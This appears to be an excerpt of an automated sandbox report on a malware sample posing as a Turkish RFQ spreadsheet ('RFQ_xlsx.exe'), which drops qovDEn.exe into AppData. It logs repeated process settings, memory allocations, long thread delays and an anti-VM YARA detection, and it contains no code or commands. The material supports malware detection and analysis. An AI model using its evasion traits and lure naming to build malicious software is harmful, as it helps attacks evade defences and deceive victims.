Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 14A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 93A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 7DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: A3A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: B3A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 4ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 8DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 7550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 9DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: ADC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 33A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Memory allocated: 31B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 599084	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598695	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 598028	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597352	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599669
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599452
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 599103
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598968
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596671
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596558
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595997
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595765
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595524
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595420
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Thread delayed: delay time: 594609
